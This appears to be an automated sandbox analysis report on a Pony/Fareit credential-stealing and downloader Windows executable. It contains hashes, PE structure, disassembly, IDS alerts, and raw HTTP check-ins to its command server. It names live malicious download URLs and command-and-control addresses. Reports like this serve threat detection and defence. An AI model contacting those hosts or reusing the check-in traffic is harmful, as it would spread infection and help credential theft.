              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
              No contacted domains info
              NameMaliciousAntivirus DetectionReputation
              http://tokulances.sitebr.net/jV1.exetrue
                unknown
                http://67.215.225.205:8080/forum/viewtopic.phptrue
                  unknown
                  http://ftp.approachit.com/jZy.exetrue
                    unknown
                    http://atualizacoes.issqn.net/FhPD.exetrue
                      unknown
                      http://67.215.225.205/forum/viewtopic.phptrue
                        unknown
                        http://209.59.219.70/forum/viewtopic.phptrue
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://https://ftp://operawand.dat_Softwarea5gvJhukP7.exe, 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                            unknown
                            https://ac.ecosia.org/autocomplete?q=a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://duckduckgo.com/chrome_newtaba5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://duckduckgo.com/ac/?q=a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoa5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              ftp://http://https://ftp.fireFTPsites.datSeaMonkeya5gvJhukP7.exe, 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                unknown
                                http://www.ibsensoftware.com/a5gvJhukP7.exe, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                  unknown
                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searcha5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://67.215.225.205:8080/forum/viewtopic.phpcva5gvJhukP7.exe, 00000001.00000002.2897820699.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://67.215.225.205:8080/forum/viewtopic.phphttp://209.59.219.70/forum/viewtopic.phphttp://ftp.appa5gvJhukP7.exe, 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                      unknown
                                      https://www.ecosia.org/newtab/a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      67.215.225.205
                                      unknownUnited States
                                      8100ASN-QUADRANET-GLOBALUStrue
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1528458
                                      Start date and time:2024-10-07 23:11:08 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 4m 1s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:6
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:a5gvJhukP7.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:18579d8151a242cf2e9b69b016479481.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@3/0@0/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 92
                                      • Number of non-executed functions: 56
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: a5gvJhukP7.exe
                                      No simulations
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      67.215.225.205HzqSbpExZl.exeGet hashmaliciousPonyBrowse
                                      • 67.215.225.205/forum/viewtopic.php
                                      YqgmaN12W1.exeGet hashmaliciousPonyBrowse
                                      • 67.215.225.205/forum/viewtopic.php
                                      3t5zTQdNnv.exeGet hashmaliciousPonyBrowse
                                      • 67.215.225.205/forum/viewtopic.php
                                      No context
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      ASN-QUADRANET-GLOBALUSPAYMENT SPECIFIKACIJA 364846637-pdf.vbsGet hashmaliciousRemcosBrowse
                                      • 64.188.16.157
                                      REQUEST FOR QUOTE-INQUIRY#87278.SAMPLE AND PRODUCTS.exeGet hashmaliciousAsyncRAT, StormKitty, VenomRATBrowse
                                      • 72.11.142.133
                                      na.elfGet hashmaliciousMiraiBrowse
                                      • 45.199.228.213
                                      81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                      • 104.223.122.15
                                      ae#U03c2.docGet hashmaliciousUnknownBrowse
                                      • 66.63.187.123
                                      SWIFT 103 202406111301435660 110624-pdf.vbsGet hashmaliciousRemcosBrowse
                                      • 64.188.16.157
                                      1728033125dd387fed0490e7ade394383eca6a3c5cb1fd0e94f8067e03fabd8e0d741cea5c331.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                      • 64.188.16.157
                                      PDFDQ_P01_303B9367_2024-10-03_185650.vbsGet hashmaliciousRemcosBrowse
                                      • 64.188.16.157
                                      rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • 104.223.44.195
                                      PO906-645S790768.xlam.xlsxGet hashmaliciousUnknownBrowse
                                      • 66.63.187.171
                                      No context
                                      No context
                                      No created / dropped files found
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.6022047417340755
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:a5gvJhukP7.exe
                                      File size:135'168 bytes
                                      MD5:18579d8151a242cf2e9b69b016479481
                                      SHA1:051bd937961bad91c2a3074eb39c001e591758d6
                                      SHA256:2371d8edbb2a1245b01cc06a870ddca49acb3be47b25e0fddc5d1b0032780bdf
                                      SHA512:ec21b41a643ea5726a8b790bd16a048c79560eefe993578877d093784c2b75fa5d1176e7eddf25451ad935b720da79e0ae4697da4047d652f1e18a85cf7b7c3d
                                      SSDEEP:3072:DfbmUkNmOJswwbO6Bmz9QKtOMGDjg3KxnP:jb/k7CZB29IMiU3W
                                      TLSH:D4D3E011E6D79472D063013824B592658F7E7C825F7067CB7B883A6FAFB26C08C68797
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u.2.1.\[1.\[1.\[^..[;.\[^..[9.\[^..[..\[8..[4.\[1.][t.\[^..[3.\[^..[0.\[^..[0.\[Rich1.\[........PE..L....Y4P.................X.
                                      Icon Hash:90cececece8e8eb0
                                      Entrypoint:0x40243f
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x503459D4 [Wed Aug 22 04:02:28 2012 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:67f41b89aedf5cc2e7fae6e5e979d124
                                      Instruction
                                      call 00007FA9B567F2E0h
                                      jmp 00007FA9B567DC8Eh
                                      mov edi, edi
                                      push ebp
                                      mov ebp, esp
                                      sub esp, 00000328h
                                      mov dword ptr [00409C38h], eax
                                      mov dword ptr [00409C34h], ecx
                                      mov dword ptr [00409C30h], edx
                                      mov dword ptr [00409C2Ch], ebx
                                      mov dword ptr [00409C28h], esi
                                      mov dword ptr [00409C24h], edi
                                      mov word ptr [00409C50h], ss
                                      mov word ptr [00409C44h], cs
                                      mov word ptr [00409C20h], ds
                                      mov word ptr [00409C1Ch], es
                                      mov word ptr [00409C18h], fs
                                      mov word ptr [00409C14h], gs
                                      pushfd
                                      pop dword ptr [00409C48h]
                                      mov eax, dword ptr [ebp+00h]
                                      mov dword ptr [00409C3Ch], eax
                                      mov eax, dword ptr [ebp+04h]
                                      mov dword ptr [00409C40h], eax
                                      lea eax, dword ptr [ebp+08h]
                                      mov dword ptr [00409C4Ch], eax
                                      mov eax, dword ptr [ebp-00000320h]
                                      mov dword ptr [00409B88h], 00010001h
                                      mov eax, dword ptr [00409C40h]
                                      mov dword ptr [00409B3Ch], eax
                                      mov dword ptr [00409B30h], C0000409h
                                      mov dword ptr [00409B34h], 00000001h
                                      mov eax, dword ptr [00409004h]
                                      mov dword ptr [ebp-00000328h], eax
                                      mov eax, dword ptr [00409008h]
                                      mov dword ptr [ebp-00000324h], eax
                                      call dword ptr [00000048h]
                                      Programming Language:
                                      • [C++] VS2010 build 30319
                                      • [ASM] VS2010 build 30319
                                      • [ C ] VS2010 build 30319
                                      • [IMP] VS2008 SP1 build 30729
                                      • [RES] VS2010 build 30319
                                      • [LNK] VS2010 build 30319
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x240000xc00.zdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xb0000x170c4.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x230000x668.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x88180x40.rdata
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x56720x5800b7d52c13b6f840ea2593e85c1ce03704False0.5963245738636364data6.474877855071261IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rdata0x70000x1fd20x200041204d0cb7f3c3c462a393f2f8bfd78cFalse0.33544921875data4.750773777834433IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .data0x90000x19000xc00b1d6e5847dbb32b0b9cea7f58cb27373False0.2138671875Matlab v4 mat-file (little endian) \200, sparse, rows 3141592654, columns 11533746412.446636984620169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0xb0000x170c40x17200f1b49f943908eca2f90a13c730a68249False0.9819362331081081data7.976039467152603IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .reloc0x230000x8280xa00af94803f0b1f93ff6fb62d63afdd880dFalse0.569140625data5.0114865128132395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .zdata0x240000x10000xc005e046ad3323cd2e81b3cdc42fba7f3a3False0.3232421875data4.4654152489392525IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_CURSOR0xb2680x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                      RT_CURSOR0xb39c0x134AmigaOS bitmap font "(", fc_YSize 4294966787, 3840 elements, 2nd "\377\003\300\377\377\200\001\377\377\300\003\377\377\340\007\377\377\370\037\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.5584415584415584
                                      RT_CURSOR0xb4d00x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.43506493506493504
                                      RT_DIALOG0xb6040x16600dataEnglishUnited States1.0003928072625698
                                      RT_DIALOG0x21c040xb0dataEnglishUnited States0.6818181818181818
                                      RT_GROUP_CURSOR0x21cb40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                      RT_GROUP_CURSOR0x21cc80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                      RT_GROUP_CURSOR0x21cdc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                      RT_VERSION0x21cf00x278data0.4620253164556962
                                      RT_MANIFEST0x21f680x15aASCII text, with CRLF line terminatorsEnglishUnited States0.5491329479768786
                                      DLLImport
                                      KERNEL32.dllHeapAlloc, Sleep, HeapFree, ExitProcess, GetVersionExA, HeapReAlloc, GetStringTypeW, MultiByteToWideChar, LCMapStringW, HeapSize, RtlUnwind, GetCommandLineA, HeapSetInformation, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetProcAddress, GetModuleHandleW, DecodePointer, WriteFile, GetStdHandle, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, GetLastError, InterlockedDecrement, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LeaveCriticalSection, EnterCriticalSection, LoadLibraryW, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, IsProcessorFeaturePresent
                                      USER32.dllSendDlgItemMessageA, EndDialog, MessageBoxExA, MessageBoxIndirectA, SystemParametersInfoA
                                      user32.dllCreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongW, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropW
                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States
                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-10-07T23:12:03.965899+02002013934ET MALWARE Win32.Fareit.A/Pony Downloader Checkin1192.168.2.45000767.215.225.2058080TCP
                                      2024-10-07T23:12:03.976557+02002014411ET MALWARE Fareit/Pony Downloader Checkin 21192.168.2.44973067.215.225.2058080TCP
                                      2024-10-07T23:12:03.976557+02002014562ET MALWARE Pony Downloader HTTP Library MSIE 5 Win981192.168.2.44973067.215.225.2058080TCP
                                      2024-10-07T23:12:03.976557+02002016550ET MALWARE Win32/Fareit Checkin 21192.168.2.44973067.215.225.2058080TCP
                                      2024-10-07T23:12:25.309473+02002013934ET MALWARE Win32.Fareit.A/Pony Downloader Checkin1192.168.2.44973067.215.225.2058080TCP
                                      2024-10-07T23:12:30.334014+02002014411ET MALWARE Fareit/Pony Downloader Checkin 21192.168.2.44973767.215.225.2058080TCP
                                      2024-10-07T23:12:30.334014+02002014562ET MALWARE Pony Downloader HTTP Library MSIE 5 Win981192.168.2.44973767.215.225.2058080TCP
                                      2024-10-07T23:12:30.334014+02002016550ET MALWARE Win32/Fareit Checkin 21192.168.2.44973767.215.225.2058080TCP
                                      2024-10-07T23:12:51.671352+02002013934ET MALWARE Win32.Fareit.A/Pony Downloader Checkin1192.168.2.44973767.215.225.2058080TCP
                                      2024-10-07T23:12:56.692133+02002014411ET MALWARE Fareit/Pony Downloader Checkin 21192.168.2.44973967.215.225.2058080TCP
                                      2024-10-07T23:12:56.692133+02002014562ET MALWARE Pony Downloader HTTP Library MSIE 5 Win981192.168.2.44973967.215.225.2058080TCP
                                      2024-10-07T23:12:56.692133+02002016550ET MALWARE Win32/Fareit Checkin 21192.168.2.44973967.215.225.2058080TCP
                                      2024-10-07T23:13:18.030156+02002013934ET MALWARE Win32.Fareit.A/Pony Downloader Checkin1192.168.2.44973967.215.225.2058080TCP
                                      2024-10-07T23:13:23.053386+02002014411ET MALWARE Fareit/Pony Downloader Checkin 21192.168.2.44988767.215.225.2058080TCP
                                      2024-10-07T23:13:23.053386+02002014562ET MALWARE Pony Downloader HTTP Library MSIE 5 Win981192.168.2.44988767.215.225.2058080TCP
                                      2024-10-07T23:13:23.053386+02002016550ET MALWARE Win32/Fareit Checkin 21192.168.2.44988767.215.225.2058080TCP
                                      2024-10-07T23:13:44.389211+02002013934ET MALWARE Win32.Fareit.A/Pony Downloader Checkin1192.168.2.44988767.215.225.2058080TCP
                                      2024-10-07T23:13:49.411372+02002014411ET MALWARE Fareit/Pony Downloader Checkin 21192.168.2.45000767.215.225.2058080TCP
                                      2024-10-07T23:13:49.411372+02002014562ET MALWARE Pony Downloader HTTP Library MSIE 5 Win981192.168.2.45000767.215.225.2058080TCP
                                      2024-10-07T23:13:49.411372+02002016550ET MALWARE Win32/Fareit Checkin 21192.168.2.45000767.215.225.2058080TCP
                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 7, 2024 23:12:03.965898991 CEST497308080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:12:03.971088886 CEST80804973067.215.225.205192.168.2.4
                                      Oct 7, 2024 23:12:03.971182108 CEST497308080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:12:03.971242905 CEST497308080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:12:03.976479053 CEST80804973067.215.225.205192.168.2.4
                                      Oct 7, 2024 23:12:03.976557016 CEST497308080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:12:03.981733084 CEST80804973067.215.225.205192.168.2.4
                                      Oct 7, 2024 23:12:25.309305906 CEST80804973067.215.225.205192.168.2.4
                                      Oct 7, 2024 23:12:25.309473038 CEST497308080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:12:25.309540033 CEST497308080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:12:25.314367056 CEST80804973067.215.225.205192.168.2.4
                                      Oct 7, 2024 23:12:30.322433949 CEST497378080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:12:30.327749968 CEST80804973767.215.225.205192.168.2.4
                                      Oct 7, 2024 23:12:30.327963114 CEST497378080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:12:30.327963114 CEST497378080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:12:30.333838940 CEST80804973767.215.225.205192.168.2.4
                                      Oct 7, 2024 23:12:30.334013939 CEST497378080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:12:30.338989019 CEST80804973767.215.225.205192.168.2.4
                                      Oct 7, 2024 23:12:51.671137094 CEST80804973767.215.225.205192.168.2.4
                                      Oct 7, 2024 23:12:51.671351910 CEST497378080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:12:51.671930075 CEST497378080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:12:51.678725004 CEST80804973767.215.225.205192.168.2.4
                                      Oct 7, 2024 23:12:56.681910992 CEST497398080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:12:56.686999083 CEST80804973967.215.225.205192.168.2.4
                                      Oct 7, 2024 23:12:56.687208891 CEST497398080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:12:56.687208891 CEST497398080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:12:56.692076921 CEST80804973967.215.225.205192.168.2.4
                                      Oct 7, 2024 23:12:56.692132950 CEST497398080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:12:56.696913004 CEST80804973967.215.225.205192.168.2.4
                                      Oct 7, 2024 23:13:18.029916048 CEST80804973967.215.225.205192.168.2.4
                                      Oct 7, 2024 23:13:18.030155897 CEST497398080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:13:18.030181885 CEST497398080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:13:18.035290956 CEST80804973967.215.225.205192.168.2.4
                                      Oct 7, 2024 23:13:23.041193962 CEST498878080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:13:23.046896935 CEST80804988767.215.225.205192.168.2.4
                                      Oct 7, 2024 23:13:23.047111988 CEST498878080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:13:23.047111988 CEST498878080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:13:23.053319931 CEST80804988767.215.225.205192.168.2.4
                                      Oct 7, 2024 23:13:23.053385973 CEST498878080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:13:23.058634043 CEST80804988767.215.225.205192.168.2.4
                                      Oct 7, 2024 23:13:44.388966084 CEST80804988767.215.225.205192.168.2.4
                                      Oct 7, 2024 23:13:44.389210939 CEST498878080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:13:44.389210939 CEST498878080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:13:44.394186020 CEST80804988767.215.225.205192.168.2.4
                                      Oct 7, 2024 23:13:49.400727034 CEST500078080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:13:49.405889034 CEST80805000767.215.225.205192.168.2.4
                                      Oct 7, 2024 23:13:49.406102896 CEST500078080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:13:49.406102896 CEST500078080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:13:49.411199093 CEST80805000767.215.225.205192.168.2.4
                                      Oct 7, 2024 23:13:49.411371946 CEST500078080192.168.2.467.215.225.205
                                      Oct 7, 2024 23:13:49.416316032 CEST80805000767.215.225.205192.168.2.4
                                      • 67.215.225.205
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.44973067.215.225.20580806608C:\Users\user\Desktop\a5gvJhukP7.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 7, 2024 23:12:03.971242905 CEST273OUTPOST /forum/viewtopic.php HTTP/1.0
                                      Host: 67.215.225.205
                                      Accept: */*
                                      Accept-Encoding: identity, *;q=0
                                      Content-Length: 177
                                      Connection: close
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.44973767.215.225.20580806608C:\Users\user\Desktop\a5gvJhukP7.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 7, 2024 23:12:30.327963114 CEST273OUTPOST /forum/viewtopic.php HTTP/1.0
                                      Host: 67.215.225.205
                                      Accept: */*
                                      Accept-Encoding: identity, *;q=0
                                      Content-Length: 177
                                      Connection: close
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.44973967.215.225.20580806608C:\Users\user\Desktop\a5gvJhukP7.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 7, 2024 23:12:56.687208891 CEST273OUTPOST /forum/viewtopic.php HTTP/1.0
                                      Host: 67.215.225.205
                                      Accept: */*
                                      Accept-Encoding: identity, *;q=0
                                      Content-Length: 177
                                      Connection: close
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.44988767.215.225.20580806608C:\Users\user\Desktop\a5gvJhukP7.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 7, 2024 23:13:23.047111988 CEST273OUTPOST /forum/viewtopic.php HTTP/1.0
                                      Host: 67.215.225.205
                                      Accept: */*
                                      Accept-Encoding: identity, *;q=0
                                      Content-Length: 177
                                      Connection: close
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
